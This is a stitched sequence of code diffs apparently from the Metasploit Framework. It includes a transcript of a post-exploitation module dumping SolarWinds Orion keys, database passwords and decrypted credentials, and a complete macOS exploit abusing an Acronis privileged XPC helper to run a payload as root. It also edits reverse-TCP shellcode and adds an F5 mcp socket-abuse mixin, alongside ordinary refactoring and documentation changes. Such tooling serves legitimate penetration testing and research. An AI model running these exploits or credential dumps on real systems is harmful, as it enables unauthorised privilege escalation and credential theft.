+Windows Server 2019 host running Orion NPM 2020 using the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2104
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1736
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118093908_default_192.168.101.125_orionssl_000289.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] Compressed size: 2064
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: orion
+[+]     Database Pass: 3qmEixYNZsElaE0JR0vt9c1NwO
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_822163.txt
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_067745.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```
+
+Host with MSSQL SSPI authentication configured for external database - use `dump` to
+extract keys, then migrate the session PID to an identity with permission to log on to
+the SQL server. Perform `export` to acquire the encrypted data, then perform `decrypt`
+to produce the plaintext:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2108
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1748
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[-] Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Login failed for user 'CESIUM137\WINNING$'..
+[-] No records exported from SQL server
+[-] Post aborted due to failure: unknown: Could not export SolarWinds Orion database records
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set AES_KEY 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+AES_KEY => 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set RSA_KEY_FILE /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+RSA_KEY_FILE => /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_INSTANCE tcp:cornflakes.cesium137.io
+MSSQL_INSTANCE => tcp:cornflakes.cesium137.io
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_DB SolarWindsOrion
+MSSQL_DB => SolarWindsOrion
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > ps
+
+Process List
+============
+
+ PID    PPID   Name                                     Arch  Session  User                                Path
+ ---    ----   ----                                     ----  -------  ----                                ----
+ 0      0      [System Process]
+ 4      0      System                                   x64   0
+ [...]
+ 10704  10636  explorer.exe                             x64   1        CESIUM137\operatorman               C:\Windows\explorer.exe
+ [...]
+
+meterpreter > migrate 10704
+[*] Migrating from 17108 to 10704...
+[*] Migration completed successfully.
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > export
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] MSSQL_INSTANCE and MSSQL_DB advanced options set, connect to SQL using SSPI
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set CSV_FILE /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+CSV_FILE => /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > decrypt 
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.2.65120.0
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091959_default_192.168.101.125_solarwinds_orion_687493.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```
@@ -0,0 +1,48 @@
+// Compiled with: gcc -framework Foundation acronis-exp.m -o acronis-exp.macho
+
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"/tmp/payload";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"/bin/zsh" arguments:arg_array caller:0xdeadbeef withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -48,28 +48,7 @@ module Metasploit
        #   * :proof [String] the HTTP response body or the session token
        def get_login_state(username, password)
          # Prep the data needed for login
-          if username.empty?
-            # no username => token is used as password
-            res = send_request({
-              'uri' => normalize_uri("#{uri}/profiles.json"),
-              'vars_get' => {
-                'recordstartindex' => '0',
-                'recordendindex' => '0'
-              },
-              'method' => 'GET',
-              'headers' => {
-                'token' => password
-              }
-            })
-            unless res
-              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
-            end
-            if !res.body.to_s.include? 'Session Expired'
-              return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body.to_s }
-            end
-
-            return { proof: res.body.to_s }
-          else
+          if username.present?
            # use username:password
            res = send_request({
              'uri' => normalize_uri("#{uri}/post_applogin.php"),
@@ -92,6 +71,27 @@ module Metasploit
            end

            return { proof: res.to_s }
+          else
+            # no username => token is used as password
+            res = send_request({
+              'uri' => normalize_uri("#{uri}/profiles.json"),
+              'vars_get' => {
+                'recordstartindex' => '0',
+                'recordendindex' => '0'
+              },
+              'method' => 'GET',
+              'headers' => {
+                'token' => password
+              }
+            })
+            unless res
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+            end
+            if !res.body.to_s.include? 'Session Expired'
+              return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body.to_s }
+            end
+
+            return { proof: res.body.to_s }
          end
        end

@@ -12,7 +12,23 @@ module Metasploit
          #

          # Number of allowed threads when threads are counted in `after(:suite)` or `before(:suite)`
-          EXPECTED_THREAD_COUNT_AROUND_SUITE = ENV['REMOTE_DB'] ? 4 : 3
+          #
+          # Known threads:
+          #   1. Main Ruby thread
+          #   2. Active Record connection pool thread
+          #   3. Framework thread manager, a monitor thread for removing dead threads
+          #      https://github.com/rapid7/metasploit-framework/blame/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/msf/core/thread_manager.rb#L66-L89
+          #   4. Ruby's Timeout library thread, an automatically created monitor thread when using `Thread.timeout(1) { }`
+          #      https://github.com/ruby/timeout/blob/bd25f4b138b86ef076e6d9d7374b159fffe5e4e9/lib/timeout.rb#L129-L137
+          #   5. REMOTE_DB thread, if enabled
+          #
+          # Intermittent threads that are non-deterministically left behind, which should be fixed in the future:
+          #   1. metadata cache hydration
+          #      https://github.com/rapid7/metasploit-framework/blob/115946cd06faccac654e956e8ba9cf72ff328201/lib/msf/core/modules/metadata/cache.rb#L150-L153
+          #   2. session manager
+          #      https://github.com/rapid7/metasploit-framework/blob/115946cd06faccac654e956e8ba9cf72ff328201/lib/msf/core/session_manager.rb#L153-L168
+          #
+          EXPECTED_THREAD_COUNT_AROUND_SUITE = ENV['REMOTE_DB'] ? 7 : 6

          # `caller` for all Thread.new calls
          LOG_PATHNAME = Pathname.new('log/metasploit/framework/spec/threads/suite.log')
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.30"
+      VERSION = "6.2.35"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -406,13 +406,13 @@ Shell Banner:
    print_line("Usage: download [src] [dst]")
    print_line
    print_line("Downloads remote files to the local machine.")
-    print_line("This command does not support to download a FOLDER yet")
+    print_line("This command does not support directories")
    print_line
  end

  def cmd_download(*args)
    if args.length != 2
-      # no argumnets, just print help message
+      # no arguments, just print help message
      return cmd_download_help
    end

@@ -421,52 +421,72 @@ Shell Banner:

    # Check if src exists
    if !_file_transfer.file_exist?(src)
-      print_error("The target file does not exist")
+      print_error('The target file does not exist')
      return
    end

+    fs_sep = platform == 'windows' ? '\\' : '/'
+    if dst.blank?
+      dst = src.split(fs_sep).last
+    elsif ::File.directory?(dst)
+      dst += ::File::SEPARATOR unless dst.end_with?(::File::SEPARATOR)
+      dst += src.split(fs_sep).last
+    end
+    dst_dir = ::File.dirname(dst)
+    ::FileUtils.mkdir_p(dst_dir) if dst_dir and not ::File.directory?(dst_dir)
+
    # Get file content
-    print_status("Download #{src} => #{dst}")
+    # match the output style of the Meterpreter equivalent
+    print_status("Downloading: #{src} -> #{dst}")
    content = _file_transfer.read_file(src)

    # Write file to local machine
-    File.binwrite(dst, content)
-    print_good("Done")
+    ::File.binwrite(dst, content)
+    print_status("Completed  : #{src} -> #{dst}")
  end

  def cmd_upload_help
    print_line("Usage: upload [src] [dst]")
    print_line
    print_line("Uploads load file to the victim machine.")
-    print_line("This command does not support to upload a FOLDER yet")
+    print_line("This command does not support directories")
    print_line
  end

  def cmd_upload(*args)
    if args.length != 2
-      # no argumnets, just print help message
+      # no arguments, just print help message
      return cmd_upload_help
    end

    src = args[0]
    dst = args[1]

+    if dst.blank?
+      dst = ::File.basename(src)
+    elsif _file_transfer.directory?(dst)
+      fs_sep = platform == 'windows' ? '\\' : '/'
+      dst += fs_sep unless dst.end_with?(fs_sep)
+      dst += ::File.basename(src)
+    end
+
    # Check target file exists on the target machine
    if _file_transfer.file_exist?(dst)
-      print_warning("The file <#{dst}> already exists on the target machine")
-      unless prompt_yesno("Overwrite the target file <#{dst}>?")
+      print_warning('The target file already exists')
+      unless prompt_yesno("Overwrite the target file #{dst}?")
        return
      end
    end

+    print_status("Uploading  : #{src} -> #{dst}")
    begin
-      content = File.binread(src)
+      # Read file from local machine
+      content = ::File.binread(src)
      _file_transfer.write_file(dst, content)
-      print_good("File <#{dst}> upload finished")
+      print_status("Completed  : #{src} -> #{dst}")
    rescue => e
-      print_error("Error occurs while uploading <#{src}> to <#{dst}> - #{e.message}")
+      print_error("Failed     : #{src} -> #{dst} - #{e.message}")
      elog(e)
-      return
    end
  end

@@ -30,6 +30,7 @@ module Auxiliary::Report
      framework.db.create_cracked_credential(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -39,6 +40,7 @@ module Auxiliary::Report
      framework.db.create_credential(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -48,6 +50,7 @@ module Auxiliary::Report
      framework.db.create_credential_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -57,6 +60,7 @@ module Auxiliary::Report
      framework.db.create_credential_and_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -66,6 +70,7 @@ module Auxiliary::Report
      framework.db.invalidate_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -8,6 +8,16 @@ require 'rex/proto/ldap'

 module Msf
  module Exploit::Remote::LDAP
+    # Initialize the LDAP client and set up the LDAP specific datastore
+    # options to allow the client to perform authentication and timeout
+    # operations. Acts as a wrapper around the caller's
+    # implementation of the `initialize` method, which will usually be
+    # the module's class's implementation, such as lib/msf/core/auxiliary.rb.
+    #
+    # @param info [Hash] A hash containing information about the module
+    #   using this library which includes its name, description, author, references,
+    #   disclosure date, license, actions, default action, default options,
+    #   and notes.
    def initialize(info = {})
      super

@@ -24,18 +34,33 @@ module Msf
      ])
    end

+    # Alias to return the RHOST datastore option.
+    #
+    # @return [String] The current value of RHOST in the datastore.
    def rhost
      datastore['RHOST']
    end

+    # Alias to return the RPORT datastore option.
+    #
+    # @return [String] The current value of RPORT in the datastore.
    def rport
      datastore['RPORT']
    end

+    # Return the peer as a host:port formatted string.
+    #
+    # @return [String] A string containing the peer details in RHOST:RPORT format.
    def peer
      "#{rhost}:#{rport}"
    end

+    # Set the various connection options to use when connecting to the
+    # target LDAP server based on the current datastore options. Returns
+    # the resulting connection configuration as a hash.
+    #
+    # @return [Hash] The options to use when connecting to the target
+    #    LDAP server.
    def get_connect_opts
      connect_opts = {
        host: rhost,
@@ -64,10 +89,28 @@ module Msf
      connect_opts
    end

+    # Connect to the target LDAP server using the options provided,
+    # and pass the resulting connection object to the proc provided.
+    # Terminate the connection once the proc finishes executing.
+    #
+    # @param opts [Hash] Options for the LDAP connection.
+    # @param block [Proc] A proc containing the functionality to execute
+    #   after the LDAP connection has succeeded. The connection is closed
+    #   once this proc finishes executing.
+    # @see Net::LDAP.open
+    # @return [Object] The result of whatever the block that was
+    #   passed in via the "block" parameter yielded.
    def ldap_connect(opts = {}, &block)
      Net::LDAP.open(get_connect_opts.merge(opts), &block)
    end

+    # Create a new LDAP connection using Net::LDAP.new and yield the
+    # resulting connection object to the caller of this method.
+    #
+    # @param opts [Hash] A hash containing the connection options for the
+    #   LDAP connection to the target server.
+    # @yieldparam ldap [Net::LDAP] The LDAP connection handle to use for connecting to
+    #   the target LDAP server.
    def ldap_new(opts = {})
      ldap = Net::LDAP.new(get_connect_opts.merge(opts))

@@ -78,9 +121,11 @@ module Msf
      # See: https://www.openldap.org/doc/admin23/security.html#Authentication%20Methods
      # "Note that disabling the anonymous bind mechanism does not prevent anonymous
      # access to the directory."
+      # Bug created for Net:LDAP at https://github.com/ruby-ldap/ruby-net-ldap/issues/375
      #
-      # Bug created for Net:LDAP https://github.com/ruby-ldap/ruby-net-ldap/issues/375
-      #
+      # @yieldparam conn [Net::LDAP] The LDAP connection handle to use for connecting to
+      #   the target LDAP server.
+      # @param args [Hash] A hash containing options for the ldap connection
      def ldap.use_connection(args)
        if @open_connection
          yield @open_connection
@@ -100,6 +145,11 @@ module Msf
      yield ldap
    end

+    # Get the naming contexts for the target LDAP server.
+    #
+    # @param ldap [Net::LDAP] The Net::LDAP connection handle for the
+    #   current LDAP connection.
+    # @return [Net::BER::BerIdentifiedArray] Array of naming contexts for the target LDAP server.
    def get_naming_contexts(ldap)
      vprint_status("#{peer} Getting root DSE")

@@ -121,7 +171,14 @@ module Msf
      naming_contexts
    end

+    # Discover the base DN of the target LDAP server via the LDAP
+    # server's naming contexts.
+    #
+    # @param ldap [Net::LDAP] The Net::LDAP connection handle for the
+    #   current LDAP connection.
+    # @return [String] A string containing the base DN of the target LDAP server.
    def discover_base_dn(ldap)
+      # @type [Net::BER::BerIdentifiedArray]
      naming_contexts = get_naming_contexts(ldap)

      unless naming_contexts
@@ -136,6 +193,16 @@ module Msf
      base_dn
    end

+    # Check whether it was possible to successfully bind to the target LDAP
+    # server. Raise a RuntimeException with an appropriate error message
+    # if not.
+    #
+    # @param ldap [Net::LDAP] The Net::LDAP connection handle for the
+    #   current LDAP connection.
+    #
+    # @raise [RuntimeError] A RuntimeError will be raised if the LDAP
+    #   bind request failed.
+    # @return [Nil] This function does not return any data.
    def validate_bind_success!(ldap)
      bind_result = ldap.as_json['result']['ldap_result']

@@ -160,6 +227,20 @@ module Msf
      end
    end

+    # Validate the query result and check whether the query succeeded.
+    # Fail with an appropriate error code if the query failed.
+    #
+    # @param query_result [Hash] A hash containing the results of the query
+    #   as a 'resultCode' with an integer representing the result code,
+    #   'errorMessage' containing an optional error message, and
+    #   'matchedDN' containing the matched DN.
+    # @param filter [Net::LDAP::Filter]  A Net::LDAP::Filter to use to
+    #   filter the results of the query.
+    #
+    # @raise [RuntimeError, ArgumentError] A RuntimeError will be raised if the LDAP
+    #   request failed. Alternatively, if the query_result parameter isn't a hash, then an
+    #   ArgumentError will be raised.
+    # @return [Nil] This function does not return any data.
    def validate_query_result!(query_result, filter)
      if query_result.class != Hash
        raise ArgumentError.new('Parameter to "validate_query_result!" function was not a Hash!')
@@ -95,7 +95,7 @@ module Payload::Linux::ReverseTcp_x64

    asm = %Q^
      mmap:
-        xor    rdi, rdi
+        xor    edi, edi
        push   0x9
        pop    rax
        cdq
@@ -104,8 +104,9 @@ module Payload::Linux::ReverseTcp_x64
        xor    r9, r9
        push   0x22
        pop    r10
-        mov    dl, 0x7
-        syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+        push   0x7
+        pop    rdx
+        syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
        test   rax, rax
        js failed

@@ -0,0 +1,376 @@
+# Encoding: ASCII-8BIT
+
+module Msf
+  class Post
+    module Linux
+      # This mixin lets you programmatically interact with F5's "mcp" service,
+      # which is a database service on a variety of F5's devices, including
+      # BIG-IP and BIG-IQ.
+      #
+      # mcp uses a UNIX domain socket @ /var/run/mcp for all communications.
+      # As of writing this module, it's world-accessible, so anybody can query
+      # or write to it. We implemented a few interesting things as modules, and
+      # your best bet for learning how to work this is to look at those modules,
+      # but this will document it briefly.
+      #
+      # Data is read and written by serializing a TLV-style structure and
+      # writing it to that socket, then parsing the response.
+      #
+      # If you're just reading data, you can use `mcp_simple_query()` to build
+      # a query that fetches everything under a given name, and get a Hash of
+      # data back. That's by far the easiest way to handle things.
+      #
+      # To create a more complex query, you'll need to use mcp_build(), which
+      # serializes a message. You can generate a single message, or an array of
+      # them. Then use mcp_send_recv() to write it/them to the socket.
+      # Additionally, mcp_send_recv() automatically parses them and returns
+      # a whole big nested array of data.
+      #
+      # To actually use that data without going crazy, I suggest using either
+      # mcp_get_single(tagname) to fetch a single tag, or
+      # mcp_get_multiple(tagname) if multiple of the same tag can be returned.
+      # Finally, the response from that can be passed to mcp_to_h() to convert
+      # the response to a hash (note that if there are multiple of the same tag,
+      # map_to_h() will only keep one of them).
+      #
+      # Obviously, this is all way more complex than mcp_simple_query(). You can
+      # see this in action in the module `linux/local/f5_create_user`.
+      module F5Mcp # rubocop:disable Metrics/ModuleLength
+        def initialize(info = {})
+          file = ::File.join(Msf::Config.data_directory, 'f5-mcp-objects.txt')
+          objects = ::File.read(file)
+
+          raise("Could not load #{file}!") unless objects
+
+          @tags_by_id =
+            objects
+            .split(/\n/)
+            .reject { |o| o.start_with?('#') }
+            .map(&:strip)
+            .map do |o|
+              value, tag = o.split(/ /, 2)
+
+              raise("Invalid line in #{file}: #{o}") if tag.nil?
+
+              [value.to_i(16), tag]
+            end
+            .to_h
+            .freeze
+
+          @tags_by_name = @tags_by_id.invert.freeze
+
+          super(info)
+        end
+
+        # Parse one or more packets (including headers) into an array of
+        # packets.
+        def mcp_parse_responses(incoming_data)
+          replies = []
+
+          while incoming_data.length > 16
+            # Grab the length and remove the header from the incoming data
+            expected_length, _, incoming_data = incoming_data.unpack('Na12a*')
+
+            # Read the packet
+            packet, incoming_data = incoming_data.unpack("a#{expected_length}a*")
+
+            # Sanity check
+            if packet.length != expected_length
+              print_warning('mcp message is truncated!')
+              return replies
+            end
+
+            # Parse it
+            replies << mcp_parse(packet)
+          end
+
+          return replies
+        end
+
+        def mcp_send_recv(messages)
+          # Attach headers to each message and combine them
+          message = messages.map do |m|
+            [m.length, 0, 0, 0, m].pack('NNNNa*')
+          end.join('')
+
+          # Encode as base64 so we can pass it on the commandline
+          message = Rex::Text.encode_base64(message)
+
+          # Sometimes, the service doesn't respond with a complete packet, but
+          # instead truncates it. This only seems to happen on very long replies,
+          # and seems to happen ~50% of the time, so running this loop 5 times
+          # gives a pretty high chance of it working
+          #
+          # This isn't a problem with Metasploit, it even happens when I use
+          # socat directly.. I think it's just because we don't have AF_UNIX.
+          # In this example, 559604 is right and 548160 is truncated:
+          #
+          # # echo 'AAAAEAAAAAAAAAAAAAAAAAtlAA0AAAAICEoADQAAAAA=' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp | wc -c
+          # 559604
+          # # echo 'AAAAEAAAAAAAAAAAAAAAAAtlAA0AAAAICEoADQAAAAA=' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp | wc -c
+          # 548160
+          #
+          # This loop is the best we can do without having access to an AF_UNIX
+          # socket (or doing something much, much more complex)
+          0.upto(4) do
+            # Send the request messages(s) to the socket
+            incoming_data = cmd_exec("echo '#{message}' | base64 -d | socat -t100 - UNIX-CONNECT:/var/run/mcp")
+
+            # Fail if we got no response or no header
+            if !incoming_data || incoming_data.length < 16
+              print_error('Request to /var/run/mcp socket failed')
+              return nil
+            end
+
+            # Get the expected length and make sure the full response is at least
+            # that long
+            expected_length = incoming_data.unpack('N').pop
+            if incoming_data.length < expected_length
+              vprint_warning("mcp responded with #{incoming_data.length} bytes instead of the promised #{expected_length} bytes! Trying again...")
+            else
+              return mcp_parse_responses(incoming_data)
+            end
+          end
+
+          print_error("mcp isn't responding with a full message, giving up")
+          nil
+        end
+
+        # Recursively parse an mcp message from a binary stream into an object
+        #
+        # Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-parser.rb
+        def mcp_parse(stream)
+          # Reminder: this has to be an array, not a hash, because there are
+          # often duplicate entries (like multiple userdb_entry results when a
+          # query is performed).
+          result = []
+
+          # Make a Hash of parsers. Some of them are recursive, which is fun!
+          #
+          # They all take the stream as an input argument, and return
+          # [value, stream]
+          parsers = {
+            # The easy stuff - simple values
+            'ulong' => proc { |s| s.unpack('Na*') },
+            'long' => proc { |s| s.unpack('Na*') },
+            'uquad' => proc { |s| s.unpack('Q>a*') },
+            'uword' => proc { |s| s.unpack('na*') },
+            'byte' => proc { |s| s.unpack('Ca*') },
+            'service' => proc { |s| s.unpack('na*') },
+
+            # Parse 'time' as a time
+            'time' => proc do |s|
+              value, s = s.unpack('Na*')
+              [Time.at(value), s]
+            end,
+
+            # Look up 'tag' values
+            'tag' => proc do |s|
+              value, s = s.unpack('na*')
+              [@tags_by_id[value], s]
+            end,
+
+            # Parse MAC addresses
+            'mac' => proc do |s|
+              value, s = s.unpack('a6a*')
+              [value.bytes.map { |b| '%02x'.format(b) }.join(':'), s]
+            end,
+
+            # 'string' is prefixed by two length values
+            'string' => proc do |s|
+              length, otherlength, s = s.unpack('Nna*')
+
+              # I'm sure the two length values have a semantic difference, but just check for sanity
+              if otherlength + 2 != length
+                raise "Inconsistent string lengths: #{length} + #{otherlength}"
+              end
+
+              s.unpack("a#{otherlength}a*")
+            end,
+
+            # 'structure' is recursive
+            'structure' => proc do |s|
+              length, s = s.unpack('Na*')
+              struct, s = s.unpack("a#{length}a*")
+
+              [mcp_parse(struct), s]
+            end,
+
+            # 'array' is a bunch of consecutive values of the same type, which
+            # means we need to index back into this same parser array
+            'array' => proc do |s|
+              length, s = s.unpack('Na*')
+              array, s = s.unpack("a#{length}a*")
+
+              type, elements, array = array.unpack('nNa*')
+              type = @tags_by_id[type] || '<unknown type 0x%04x>'.format(type)
+
+              array_results = []
+              elements.times do
+                array_result, array = parsers[type].call(array)
+                array_results << array_result
+              end
+
+              [array_results, s]
+            end
+          }
+
+          begin
+            while stream.length > 2
+              tag, type, stream = stream.unpack('nna*')
+
+              tag = @tags_by_id[tag] || '<unknown tag 0x%04x>'.format(tag)
+              type = @tags_by_id[type] || '<unknown type 0x%04x>'.format(type)
+
+              if parsers[type]
+                value, stream = parsers[type].call(stream)
+                result << {
+                  tag: tag,
+                  value: value
+                }
+              else
+                raise "Tried to parse unknown mcp type (skipping): type = #{type}, tag = #{tag}"
+              end
+            end
+          rescue StandardError => e
+            # If we fail somewhere, print a warning but return what we have
+            print_warning("Parsing mcp data failed: #{e.message}")
+          end
+
+          result
+        end
+
+        # Pull a single value out of a tag/value structure (ie, the thing
+        # returned by mcp_parse()). The result is:
+        #
+        # * If there are no values with that tag name, return nil
+        # * If there's a single value with that tag name, return it
+        # * If there are multiple values with that tag name, print an error
+        #   and return nil
+        def mcp_get_single(hash, name)
+          # Get all the entries
+          entries = mcp_get_multiple(hash, name)
+
+          if entries.empty?
+            # If there are none, return nil
+            return nil
+          elsif entries.length == 1
+            # If there's one, return it
+            return entries.pop
+          else
+            # If there are multiple entries, print a warning and return nil
+            print_error("Query for mcp type #{name} was supposed to have one response but had #{entries.length}")
+            return nil
+          end
+        end
+
+        # Pull an array of tags with the same name out of a tag/value structure.
+        # For example, when you perform a query for `userdb_entry`, it returns
+        # multiple tags with the same name.
+        #
+        # The result is:
+        # * If there are no values, return an empty array
+        # * If there are one or more values, return them as an array
+        def mcp_get_multiple(hash, name)
